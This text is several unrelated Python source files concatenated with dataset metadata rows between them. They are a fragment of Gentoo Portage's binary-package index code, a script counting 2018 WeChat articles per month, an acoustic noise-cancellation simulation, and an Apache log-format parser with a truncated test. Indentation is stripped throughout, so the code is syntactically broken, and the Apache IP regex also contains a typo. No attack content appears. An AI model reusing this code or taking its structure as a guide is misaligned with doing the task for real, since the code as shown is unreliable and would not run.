writemsg_stdout("\n")
writemsg_stdout(
colorize("GOOD", _("Local copy of remote index is up-to-date and will be used.")) + \
"\n")
rmt_idx = pkgindex
except EnvironmentError as e:
writemsg(_("\n\n!!! Error fetching binhost package" \
" info from '%s'\n") % _hide_url_passwd(base_url))
writemsg("!!! %s\n\n" % str(e))
del e
pkgindex = None
if proc is not None:
if proc.poll() is None:
proc.kill()
proc.wait()
proc = None
if tmp_filename is not None:
try:
os.unlink(tmp_filename)
except OSError:
pass
if pkgindex is rmt_idx:
pkgindex.modified = False # don't update the header
try:
ensure_dirs(os.path.dirname(pkgindex_file))
f = atomic_ofstream(pkgindex_file)
pkgindex.write(f)
f.close()
except (IOError, PortageException):
if os.access(os.path.dirname(pkgindex_file), os.W_OK):
raise
# The current user doesn't have permission to cache the
# file, but that's alright.
if pkgindex:
# Organize remote package list as a cpv -> metadata map.
remotepkgs = _pkgindex_cpv_map_latest_build(pkgindex)
remote_base_uri = pkgindex.header.get("URI", base_url)
for cpv, remote_metadata in remotepkgs.items():
remote_metadata["BASE_URI"] = remote_base_uri
self._pkgindex_uri[cpv] = url
self._remotepkgs.update(remotepkgs)
self._remote_has_index = True
for cpv in remotepkgs:
self.dbapi.cpv_inject(cpv)
if True:
# Remote package instances override local package
# if they are not identical.
hash_names = ["SIZE"] + self._pkgindex_hashes
for cpv, local_metadata in metadata.items():
remote_metadata = self._remotepkgs.get(cpv)
if remote_metadata is None:
continue
# Use digests to compare identity.
identical = True
for hash_name in hash_names:
local_value = local_metadata.get(hash_name)
if local_value is None:
continue
remote_value = remote_metadata.get(hash_name)
if remote_value is None:
continue
if local_value != remote_value:
identical = False
break
if identical:
del self._remotepkgs[cpv]
else:
# Override the local package in the aux_get cache.
self.dbapi._aux_cache[cpv] = remote_metadata
else:
# Local package instances override remote instances.
for cpv in metadata:
self._remotepkgs.pop(cpv, None)
self.populated=1
def inject(self, cpv, filename=None):
"""Add a freshly built package to the database. This updates
$PKGDIR/Packages with the new package metadata (including MD5).
@param cpv: The cpv of the new package to inject
@type cpv: string
@param filename: File path of the package to inject, or None if it's
already in the location returned by getname()
@type filename: string
@rtype: None
"""
mycat, mypkg = catsplit(cpv)
if not self.populated:
self.populate()
if filename is None:
full_path = self.getname(cpv)
else:
full_path = filename
try:
s = os.stat(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
writemsg(_("!!! Binary package does not exist: '%s'\n") % full_path,
noiselevel=-1)
return
mytbz2 = portage.xpak.tbz2(full_path)
slot = mytbz2.getfile("SLOT")
if slot is None:
writemsg(_("!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
return
slot = slot.strip()
self.dbapi.cpv_inject(cpv)
# Reread the Packages index (in case it's been changed by another
		# process) and then update it, all while holding a lock.
pkgindex_lock = None
created_symlink = False
try:
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
if filename is not None:
new_filename = self.getname(cpv)
try:
samefile = os.path.samefile(filename, new_filename)
except OSError:
samefile = False
if not samefile:
self._ensure_dir(os.path.dirname(new_filename))
_movefile(filename, new_filename, mysettings=self.settings)
if self._all_directory and \
self.getname(cpv).split(os.path.sep)[-2] == "All":
self._create_symlink(cpv)
created_symlink = True
pkgindex = self._load_pkgindex()
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
# Discard remote metadata to ensure that _pkgindex_entry
# gets the local metadata. This also updates state for future
# isremote calls.
if self._remotepkgs is not None:
self._remotepkgs.pop(cpv, None)
# Discard cached metadata to ensure that _pkgindex_entry
# doesn't return stale metadata.
self.dbapi._aux_cache.pop(cpv, None)
try:
d = self._pkgindex_entry(cpv)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(cpv), noiselevel=-1)
self.dbapi.cpv_remove(cpv)
del self._pkg_paths[cpv]
return
# If found, remove package(s) with duplicate path.
path = d.get("PATH", "")
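			# Walk the list backwards so entries can be deleted while iterating.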
for i in range(len(pkgindex.packages) - 1, -1, -1):
d2 = pkgindex.packages[i]
if path and path == d2.get("PATH"):
# Handle path collisions in $PKGDIR/All
# when CPV is not identical.
del pkgindex.packages[i]
elif cpv == d2.get("CPV"):
if path == d2.get("PATH", ""):
del pkgindex.packages[i]
elif created_symlink and not d2.get("PATH", ""):
# Delete entry for the package that was just
# overwritten by a symlink to this package.
del pkgindex.packages[i]
pkgindex.packages.append(d)
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
def _pkgindex_write(self, pkgindex):
contents = codecs.getwriter(_encodings['repo.content'])(io.BytesIO())
pkgindex.write(contents)
contents = contents.getvalue()
atime = mtime = long(pkgindex.header["TIMESTAMP"])
output_files = [(atomic_ofstream(self._pkgindex_file, mode="wb"),
self._pkgindex_file, None)]
if "compress-index" in self.settings.features:
gz_fname = self._pkgindex_file + ".gz"
fileobj = atomic_ofstream(gz_fname, mode="wb")
output_files.append((GzipFile(filename='', mode="wb",
fileobj=fileobj, mtime=mtime), gz_fname, fileobj))
for f, fname, f_close in output_files:
f.write(contents)
f.close()
if f_close is not None:
f_close.close()
# some seconds might have elapsed since TIMESTAMP
os.utime(fname, (atime, mtime))
def _pkgindex_entry(self, cpv):
"""
Performs checksums and evaluates USE flag conditionals.
Raises InvalidDependString if necessary.
@rtype: dict
		@return: a dict containing an entry for the given cpv.
"""
pkg_path = self.getname(cpv)
d = dict(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(cpv, self._pkgindex_aux_keys)))
d.update(perform_multiple_checksums(
pkg_path, hashes=self._pkgindex_hashes))
d["CPV"] = cpv
st = os.stat(pkg_path)
d["MTIME"] = str(st[stat.ST_MTIME])
d["SIZE"] = str(st.st_size)
rel_path = self._pkg_paths[cpv]
# record location if it's non-default
if rel_path != cpv + ".tbz2":
d["PATH"] = rel_path
self._eval_use_flags(cpv, d)
return d
def _new_pkgindex(self):
return portage.getbinpkg.PackageIndex(
allowed_pkg_keys=self._pkgindex_allowed_pkg_keys,
default_header_data=self._pkgindex_default_header_data,
default_pkg_data=self._pkgindex_default_pkg_data,
inherited_keys=self._pkgindex_inherited_keys,
translated_keys=self._pkgindex_translated_keys)
def _update_pkgindex_header(self, header):
portdir = normalize_path(os.path.realpath(self.settings["PORTDIR"]))
profiles_base = os.path.join(portdir, "profiles") + os.path.sep
if self.settings.profile_path:
profile_path = normalize_path(
os.path.realpath(self.settings.profile_path))
if profile_path.startswith(profiles_base):
profile_path = profile_path[len(profiles_base):]
header["PROFILE"] = profile_path
header["VERSION"] = str(self._pkgindex_version)
base_uri = self.settings.get("PORTAGE_BINHOST_HEADER_URI")
if base_uri:
header["URI"] = base_uri
else:
header.pop("URI", None)
for k in self._pkgindex_header_keys:
v = self.settings.get(k, None)
if v:
header[k] = v
else:
header.pop(k, None)
def _pkgindex_version_supported(self, pkgindex):
version = pkgindex.header.get("VERSION")
if version:
try:
if int(version) <= self._pkgindex_version:
return True
except ValueError:
pass
return False
def _eval_use_flags(self, cpv, metadata):
use = frozenset(metadata["USE"].split())
raw_use = use
iuse = set(f.lstrip("-+") for f in metadata["IUSE"].split())
use = [f for f in use if f in iuse]
use.sort()
metadata["USE"] = " ".join(use)
for k in self._pkgindex_use_evaluated_keys:
if k.endswith('DEPEND'):
token_class = Atom
else:
token_class = None
try:
deps = metadata[k]
deps = use_reduce(deps, uselist=raw_use, token_class=token_class)
deps = paren_enclose(deps)
except portage.exception.InvalidDependString as e:
writemsg("%s: %s\n" % (k, str(e)),
noiselevel=-1)
raise
metadata[k] = deps
def exists_specific(self, cpv):
if not self.populated:
self.populate()
return self.dbapi.match(
dep_expand("="+cpv, mydb=self.dbapi, settings=self.settings))
def dep_bestmatch(self, mydep):
"compatibility method -- all matches, not just visible ones"
if not self.populated:
self.populate()
writemsg("\n\n", 1)
writemsg("mydep: %s\n" % mydep, 1)
mydep = dep_expand(mydep, mydb=self.dbapi, settings=self.settings)
writemsg("mydep: %s\n" % mydep, 1)
mykey = dep_getkey(mydep)
writemsg("mykey: %s\n" % mykey, 1)
mymatch = best(match_from_list(mydep,self.dbapi.cp_list(mykey)))
writemsg("mymatch: %s\n" % mymatch, 1)
if mymatch is None:
return ""
return mymatch
def getname(self, pkgname):
"""Returns a file location for this package. The default location is
${PKGDIR}/All/${PF}.tbz2, but will be ${PKGDIR}/${CATEGORY}/${PF}.tbz2
in the rare event of a collision. The prevent_collision() method can
be called to ensure that ${PKGDIR}/All/${PF}.tbz2 is available for a
specific cpv."""
if not self.populated:
self.populate()
mycpv = pkgname
mypath = self._pkg_paths.get(mycpv, None)
if mypath:
return os.path.join(self.pkgdir, mypath)
mycat, mypkg = catsplit(mycpv)
if self._all_directory:
mypath = os.path.join("All", mypkg + ".tbz2")
if mypath in self._pkg_paths.values():
mypath = os.path.join(mycat, mypkg + ".tbz2")
else:
mypath = os.path.join(mycat, mypkg + ".tbz2")
self._pkg_paths[mycpv] = mypath # cache for future lookups
return os.path.join(self.pkgdir, mypath)
def isremote(self, pkgname):
"""Returns true if the package is kept remotely and it has not been
downloaded (or it is only partially downloaded)."""
if self._remotepkgs is None or pkgname not in self._remotepkgs:
return False
# Presence in self._remotepkgs implies that it's remote. When a
# package is downloaded, state is updated by self.inject().
return True
def get_pkgindex_uri(self, pkgname):
"""Returns the URI to the Packages file for a given package."""
return self._pkgindex_uri.get(pkgname)
def gettbz2(self, pkgname):
"""Fetches the package from a remote site, if necessary. Attempts to
resume if the file appears to be partially downloaded."""
tbz2_path = self.getname(pkgname)
tbz2name = os.path.basename(tbz2_path)
resume = False
if os.path.exists(tbz2_path):
if tbz2name[:-5] not in self.invalids:
return
else:
resume = True
writemsg(_("Resuming download of this tbz2, but it is possible that it is corrupt.\n"),
noiselevel=-1)
mydest = os.path.dirname(self.getname(pkgname))
self._ensure_dir(mydest)
# urljoin doesn't work correctly with unrecognized protocols like sftp
if self._remote_has_index:
rel_url = self._remotepkgs[pkgname].get("PATH")
if not rel_url:
rel_url = pkgname+".tbz2"
remote_base_uri = self._remotepkgs[pkgname]["BASE_URI"]
url = remote_base_uri.rstrip("/") + "/" + rel_url.lstrip("/")
else:
url = self.settings["PORTAGE_BINHOST"].rstrip("/") + "/" + tbz2name
protocol = urlparse(url)[0]
fcmd_prefix = "FETCHCOMMAND"
if resume:
fcmd_prefix = "RESUMECOMMAND"
fcmd = self.settings.get(fcmd_prefix + "_" + protocol.upper())
if not fcmd:
fcmd = self.settings.get(fcmd_prefix)
success = portage.getbinpkg.file_get(url, mydest, fcmd=fcmd)
if not success:
try:
os.unlink(self.getname(pkgname))
except OSError:
pass
raise portage.exception.FileNotFound(mydest)
self.inject(pkgname)
def _load_pkgindex(self):
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(self._pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
except EnvironmentError:
pass
else:
try:
pkgindex.read(f)
finally:
f.close()
return pkgindex
def digestCheck(self, pkg):
"""
Verify digests for the given package and raise DigestException
if verification fails.
@rtype: bool
@return: True if digests could be located, False otherwise.
"""
cpv = pkg
if not isinstance(cpv, basestring):
cpv = pkg.cpv
pkg = None
pkg_path = self.getname(cpv)
metadata = None
if self._remotepkgs is None or cpv not in self._remotepkgs:
for d in self._load_pkgindex().packages:
if d["CPV"] == cpv:
metadata = d
break
else:
metadata = self._remotepkgs[cpv]
if metadata is None:
return False
digests = {}
for k in hashfunc_map:
v = metadata.get(k)
if not v:
continue
digests[k] = v
if "SIZE" in metadata:
try:
digests["size"] = int(metadata["SIZE"])
except ValueError:
writemsg(_("!!! Malformed SIZE attribute in remote " \
"metadata for '%s'\n") % cpv)
if not digests:
return False
hash_filter = _hash_filter(
self.settings.get("PORTAGE_CHECKSUM_FILTER", ""))
if not hash_filter.transparent:
digests = _apply_hash_filter(digests, hash_filter)
eout = EOutput()
eout.quiet = self.settings.get("PORTAGE_QUIET") == "1"
ok, st = _check_distfile(pkg_path, digests, eout, show_errors=0)
if not ok:
ok, reason = verify_all(pkg_path, digests)
if not ok:
raise portage.exception.DigestException(
(pkg_path,) + tuple(reason))
return True
def getslot(self, mycatpkg):
"Get a slot for a catpkg; assume it exists."
myslot = ""
try:
myslot = self.dbapi._pkg_str(mycatpkg, None).slot
except KeyError:
pass
return myslot
| gpl-2.0 | -7,462,835,677,793,273,000 | 30.585795 | 91 | 0.652544 | false | 2.932363 | false | false | false |
hhj0325/pystock | com/hhj/sogou/countByTime.py | 1 | 1082 | """
Select the articles published in 2018 and count them by month
"""
import numpy as np
import pandas as pd
from pyecharts import Bar
df = pd.read_csv('sg_articles.csv', header=None, names=["title", "article", "name", "date"])
list1 = []
list2 = []
for j in df['date']:
    # Extract the publication year and month of each article
time_1 = j.split('-')[0]
time_2 = j.split('-')[1]
list1.append(time_1)
list2.append(time_2)
df['year'] = list1
df['month'] = list2
# Keep only the articles published in 2018 and count them by month
df = df.loc[df['year'] == '2018']
month_message = df.groupby(['month'])
month_com = month_message['month'].agg(['count'])
month_com.reset_index(inplace=True)
month_com_last = month_com.sort_index()
attr = ["{}".format(str(i) + '月') for i in range(1, 13)]  # month labels 1月–12月
v1 = np.array(month_com_last['count'])
v1 = ["{}".format(int(i)) for i in v1]
bar = Bar("微信文章发布时间分布", title_pos='center', title_top='18', width=800, height=400)
bar.add("", attr, v1, is_stack=True, is_label_show=True)
bar.render("微信文章发布时间分布.html") | apache-2.0 | 4,181,870,580,663,964,700 | 27.333333 | 92 | 0.641328 | false | 2.162037 | false | false | false |
szarvas/anc-field | examples/ie224-impulse.py | 1 | 5152 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal, stats
import sys
sys.path.append('..')
from anc_field_py.ancfield import *
from anc_field_py.ancutil import *
def add_microphones(ancObject):
# error_mic
ancObject.AddMic([4,1.6,5.3])
# reference_front
ancObject.AddMic([4,1.6,4.5])
# reference_back
ancObject.AddMic([4,1.6,6.5])
# reference_left
ancObject.AddMic([3,1.6,5.5])
# reference_right
ancObject.AddMic([5,1.6,5.5])
# reference_bottom
ancObject.AddMic([4,0.6,5.5])
# reference_top
ancObject.AddMic([4,2.6,5.5])
return ancObject
# =========================================================================
# SIMULATION 1
# Calculating noise to microphone paths
# =========================================================================
#
# Trying to run this simulation on CPU failed on an i7-3770, compiling the
# lrs_1.cl file fails. It may be because the scene's size is too large for the
# CPU. Compiling it for the built-in integrated GPU worked, though.
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# noise_source
anc.AddSource([4,1.6,1.0], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_noise) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-noise-to-error.dat', y_noise[0,:])
np.savetxt('ie224-noise-to-reference_front.dat', y_noise[1,:])
np.savetxt('ie224-noise-to-reference_back.dat', y_noise[2,:])
np.savetxt('ie224-noise-to-reference_left.dat', y_noise[3,:])
np.savetxt('ie224-noise-to-reference_right.dat', y_noise[4,:])
np.savetxt('ie224-noise-to-reference_bottom.dat', y_noise[5,:])
np.savetxt('ie224-noise-to-reference_top.dat', y_noise[6,:])
# =========================================================================
# SIMULATION 2
# Calculating actuator to microphone paths
# =========================================================================
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# actuator
anc.AddSource([4,1.6,5.5], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_actuator) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-actuator-to-error.dat', y_actuator[0,:])
np.savetxt('ie224-actuator-to-reference_front.dat', y_actuator[1,:])
np.savetxt('ie224-actuator-to-reference_back.dat', y_actuator[2,:])
np.savetxt('ie224-actuator-to-reference_left.dat', y_actuator[3,:])
np.savetxt('ie224-actuator-to-reference_right.dat', y_actuator[4,:])
np.savetxt('ie224-actuator-to-reference_bottom.dat', y_actuator[5,:])
np.savetxt('ie224-actuator-to-reference_top.dat', y_actuator[6,:])
# =========================================================================
# GENERATING IMAGES FOR THE REPORT
# Calculating actuator to microphone paths
# =========================================================================
#
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_noise[0,:])
plt.title('ie224-noise-to-error')
fig.savefig('ie224-noise-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_noise[1,:])
plt.title('ie224-noise-to-reference_front')
fig.savefig('ie224-noise-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_noise[2,:])
plt.title('ie224-noise-to-reference_back')
fig.savefig('ie224-noise-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_noise[3,:])
plt.title('ie224-noise-to-reference_left')
fig.savefig('ie224-noise-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_noise[4,:])
plt.title('ie224-noise-to-reference_right')
fig.savefig('ie224-noise-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_noise[5,:])
plt.title('ie224-noise-to-reference_bottom')
fig.savefig('ie224-noise-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_noise[6,:])
plt.title('ie224-noise-to-reference_top')
fig.savefig('ie224-noise-to-reference_top.png')
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_actuator[0,:])
plt.title('ie224-actuator-to-error')
fig.savefig('ie224-actuator-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[1,:])
plt.title('ie224-actuator-to-reference_front')
fig.savefig('ie224-actuator-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[2,:])
plt.title('ie224-actuator-to-reference_back')
fig.savefig('ie224-actuator-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[3,:])
plt.title('ie224-actuator-to-reference_left')
fig.savefig('ie224-actuator-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[4,:])
plt.title('ie224-actuator-to-reference_right')
fig.savefig('ie224-actuator-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[5,:])
plt.title('ie224-actuator-to-reference_bottom')
fig.savefig('ie224-actuator-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[6,:])
plt.title('ie224-actuator-to-reference_top')
fig.savefig('ie224-actuator-to-reference_top.png')
| gpl-3.0 | -1,775,381,104,183,834,000 | 28.44 | 75 | 0.646545 | false | 2.813763 | false | false | false |
minersoft/httpd_logs | apache_log.py | 1 | 13255 | #
# Copyright Michael Groys, 2014
#
from ncsa_log import NCSALogFormat, NCSALogRecord, FieldNotDefinedException
from m.utilities import mergeDictionaries
import re
class ApacheLogFormat(NCSALogFormat):
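    # Template placeholder syntax for Apache directives: an optional ">" plus a
    # single letter (e.g. "%>s", "%D"), or "{name}" followed by one of i/e/o/C
    # (e.g. "%{Referer}i").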
idpattern = r"\>?[a-zA-Z]|\{[-\w]+\}[ieoC]"
# continue field numbering after NCSA basic fields
START_FIELD = NCSALogFormat.NUM_FIELDS
FLD_REMOTE_IP = START_FIELD
FLD_LOCAL_IP = START_FIELD+1
FLD_DURATION_USEC = START_FIELD+2
FLD_FILENAME = START_FIELD+3
FLD_KEEPALIVE_NUM = START_FIELD+4
FLD_PORT = START_FIELD+5
FLD_WORKER_PID = START_FIELD+6
FLD_QUERY_STRING = START_FIELD+7
FLD_HANDLER = START_FIELD+8
FLD_DURATION_SEC = START_FIELD+9
FLD_DEFINED_SERVER_NAME = START_FIELD+10
FLD_SERVER_NAME = START_FIELD+11
FLD_CONNECTION_STATUS = START_FIELD+12
FLD_RECEIVED_BYTES = START_FIELD+13
FLD_SENT_BYTES = START_FIELD+14
FLD_USER_AGENT = START_FIELD+15
FLD_REFERER = START_FIELD+16
FLD_CONTENT_TYPE = START_FIELD+17
FLD_CONTENT_LENGTH = START_FIELD+18
NUM_FIELDS = START_FIELD+19
ourFieldReferences = {
"a": [("remoteIp", FLD_REMOTE_IP)],
"A": [("localIp", FLD_LOCAL_IP)],
"B": [("bytesZero", NCSALogFormat.FLD_NUMBYTES)],
"D": [("durationUsec", FLD_DURATION_USEC)],
"f": [("filename", FLD_FILENAME)],
"H": [("protocol", NCSALogFormat.FLD_PROTOCOL)],
"k": [("keepaliveNum", FLD_KEEPALIVE_NUM)],
"m": [("method", NCSALogFormat.FLD_METHOD)],
"p": [("port", FLD_PORT)],
"P": [("workerPid", FLD_WORKER_PID)],
"q": [("queryString", NCSALogFormat.FLD_QUERY_STRING)],
"R": [("handler", FLD_HANDLER)],
"T": [("durationSec", FLD_DURATION_SEC)],
"U": [("urlPath", NCSALogFormat.FLD_URL_PATH)],
"v": [("definedServerName", FLD_DEFINED_SERVER_NAME)],
"V": [("serverName", FLD_SERVER_NAME)],
"X": [("connectionStatus", FLD_CONNECTION_STATUS)],
"I": [("receivedBytes", FLD_RECEIVED_BYTES)],
"O": [("sentBytes", FLD_SENT_BYTES)],
"{User-agent}i":[("_User_agent_i", FLD_USER_AGENT)],
"{Referer}i": [("_Referer_i", FLD_REFERER)],
"{Content-type}o": [("_Content_type_o", FLD_CONTENT_TYPE)],
"{Content-length}o": [("_Content_length_o", FLD_CONTENT_LENGTH)],
}
fieldReferences = mergeDictionaries(NCSALogFormat.fieldReferences, ourFieldReferences)
ourFieldPatterns = {
"a": r"(?P<remoteIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"A": r"(?P<localIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"B": r"(?P<bytesZero>\d+)",
"D": r"(?P<durationUsec>\d+)",
"f": r"(?P<filename>[^\s]+)",
"H": r"(?P<protocol>[\w/.]+)",
"k": r"(?P<keepaliveNum>\d+)",
"m": r"(?P<method>[A-Z]+)",
"p": r"(?P<port>\d+)",
"P": r"(?P<workerPid>\d+)",
"q": r"(?P<queryString>\?[^\s]+|)",
"R": r"(?P<handler>[^\s]+)",
"T": r"(?P<durationSec>\d+)",
"U": r"(?P<urlPath>[^\s?]+)",
"v": r"(?P<definedServerName>[^\s]+)",
"V": r"(?P<serverName>[^\s]+)",
"X": r"(?P<connectionStatus>[-X+])",
"I": r"(?P<receivedBytes>\d+)",
"O": r"(?P<sentBytes>\d+)",
"{User-agent}i": r"(?P<_User_agent_i>[^\"]*)",
"{Referer}i": r"(?P<_Referer_i>[^\s]+|-)",
"{Content-type}o": r"(?P<_Content_type_o>[^\"]+|-)",
"{Content-length}o": r"(?P<_Content_length_o>\d+|-)",
}
fieldPatterns = mergeDictionaries(NCSALogFormat.fieldPatterns, ourFieldPatterns)
# exceptional fields have both direct access and access via corresponding container
exceptionalFields = set(["{User-agent}i", "{Referer}i", "{Content-type}o", "{Content-length}o"])
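    # Shorthand names that expand to full Apache LogFormat strings.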
predefinedFormats = {
"common": "%h %l %u %t \"%r\" %>s %b",
"vcommon": "%v %h %l %u %t \"%r\" %>s %b",
"extended": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
"combined": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
}
def __init__(self, formatStr):
self.inputHdrFields = {}
self.outputHdrFields = {}
        self.envHdrFields = {}
        self.cookieHdrFields = {}
resolved = ApacheLogFormat.predefinedFormats.get(formatStr)
if resolved:
formatStr = resolved
NCSALogFormat.__init__(self, formatStr)
fieldSubRE = re.compile("[-{}]")
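    # Maps a directive such as "{User-agent}i" to a valid regex group name ("_User_agent_i").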
def getCollectionFieldGroupName(self, field):
return ApacheLogFormat.fieldSubRE.sub("_", field)
def getPattern(self, field, default):
if field.startswith("{"):
if field in self.__class__.exceptionalFields:
pattern = NCSALogFormat.getPattern(self, field, default)
elif len(field)>3 and (field[-2:] in ["}i", "}o", "}e", "}c"]):
groupName =self.getCollectionFieldGroupName(field)
pattern = r"(?P<%s>.*)" % groupName
else:
pattern = default
else:
pattern = NCSALogFormat.getPattern(self, field, default)
return pattern
def registerFieldReferences(self, field):
NCSALogFormat.registerFieldReferences(self, field)
if len(field)>3:
if field[-2:] == "}i":
self.addReference(self.getCollectionFieldGroupName(field), self.inputHdrFields, field[1:-2])
elif field[-2:] == "}o":
self.addReference(self.getCollectionFieldGroupName(field), self.outputHdrFields, field[1:-2])
elif field[-2:] == "}e":
self.addReference(self.getCollectionFieldGroupName(field), self.envHdrFields, field[1:-2])
elif field[-2:] == "}C":
self.addReference(self.getCollectionFieldGroupName(field), self.cookieHdrFields, field[1:-2])
def getInputHdrField(self, fieldName, matchObj):
groupId = self.inputHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasInputHdrField(self,fieldName):
return fieldName in self.inputHdrFields
def getOutputHdrField(self, fieldName, matchObj):
groupId = self.outputHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasOutputHdrField(self,fieldName):
return fieldName in self.outputHdrFields
def getEnvHdrField(self, fieldName, matchObj):
groupId = self.envHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasEnvHdrField(self,fieldName):
return fieldName in self.envHdrFields
def getCookieHdrField(self, fieldName, matchObj):
groupId = self.cookieHdrFields.get(fieldName)
        if groupId is None:
raise FieldNotDefinedException(fieldName)
else:
return matchObj.group(groupId)
def hasCookieHdrField(self,fieldName):
return fieldName in self.cookieHdrFields
class ApacheLogRecord(NCSALogRecord):
def __init__(self, format, line, match=None):
NCSALogRecord.__init__(self, format, line, match)
def inputHdrField(self, fieldName):
return self._format.getInputHdrField(fieldName, self._match)
def outputHdrField(self, fieldName):
return self._format.getOutputHdrField(fieldName, self._match)
def envHdrField(self, fieldName):
return self._format.getEnvHdrField(fieldName, self._match)
def cookieHdrField(self, fieldName):
return self._format.getCookieHdrField(fieldName, self._match)
@property
def remoteIp(self):
return self._format.getField(ApacheLogFormat.FLD_REMOTE_IP, self._match)
@property
def localIp(self):
return self._format.getField(ApacheLogFormat.FLD_LOCAL_IP, self._match)
@property
def durationUsecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_USEC, self._match)
@property
def durationUsec(self):
val = self.durationUsecAsStr
return 0 if val=="-" else int(val)
@property
def durationSecAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_DURATION_SEC, self._match)
@property
def durationSec(self):
val = self.durationSecAsStr
return 0 if val=="-" else int(val)
@property
def duration(self):
if self._format.hasField(ApacheLogFormat.FLD_DURATION_USEC):
return self.durationUsec/1000000.
return float(self.durationSec)
@property
def filename(self):
return self._format.getField(ApacheLogFormat.FLD_FILENAME, self._match)
@property
def keepaliveNumAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_KEEPALIVE_NUM, self._match)
@property
def keepaliveNum(self):
val = self.keepaliveNumAsStr
return 0 if val=="-" else int(val)
@property
def portAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_PORT, self._match)
@property
def port(self):
val = self.portAsStr
return 0 if val=="-" else int(val)
@property
def workerPidAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_WORKER_PID, self._match)
@property
def workerPid(self):
val = self.workerPidAsStr
return 0 if val=="-" else int(val)
@property
def handler(self):
return self._format.getField(ApacheLogFormat.FLD_HANDLER, self._match)
@property
def definedServerName(self):
return self._format.getField(ApacheLogFormat.FLD_DEFINED_SERVER_NAME, self._match)
@property
def serverName(self):
return self._format.getField(ApacheLogFormat.FLD_SERVER_NAME, self._match)
@property
def connectionStatus(self):
return self._format.getField(ApacheLogFormat.FLD_CONNECTION_STATUS, self._match)
@property
def receivedBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_RECEIVED_BYTES, self._match)
@property
def receivedBytes(self):
val = self.receivedBytesAsStr
return 0 if val=="-" else int(val)
@property
def sentBytesAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_SENT_BYTES, self._match)
@property
def sentBytes(self):
val = self.sentBytesAsStr
return 0 if val=="-" else int(val)
@property
def userAgent(self):
return self._format.getField(ApacheLogFormat.FLD_USER_AGENT, self._match)
@property
def referer(self):
return self._format.getField(ApacheLogFormat.FLD_REFERER, self._match)
@property
def contentType(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_TYPE, self._match)
@property
def contentLengthAsStr(self):
return self._format.getField(ApacheLogFormat.FLD_CONTENT_LENGTH, self._match)
@property
def contentLength(self):
val = self.contentLengthAsStr
return -1 if val=="-" else int(val)
def getTestApacheRecord():
alf = ApacheLogFormat(formatStr = "extended")
line = '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"'
return ApacheLogRecord(alf, line)
def getTestCustomApacheRecord():
alf = ApacheLogFormat(formatStr = "%t %Dusec %h \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" \"%{Content-type}o\" %{Content-length}o")
line = '[30/Oct/2014:23:28:19 +0200] 134usec 127.0.0.1 "GET http://www.host.com/path?query HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" "text/html; charset=ISO-8859-4" 1000'
return ApacheLogRecord(alf, line)
def test():
import m.ut_utils as ut
ut.START_TEST("apache_log_basic")
record = getTestApacheRecord()
ut.EXPECT_EQ("", "record.queryString")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.referer")
ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.userAgent")
ut.EXPECT_EQ("http://www.example.com/start.html", "record.inputHdrField('Referer')")
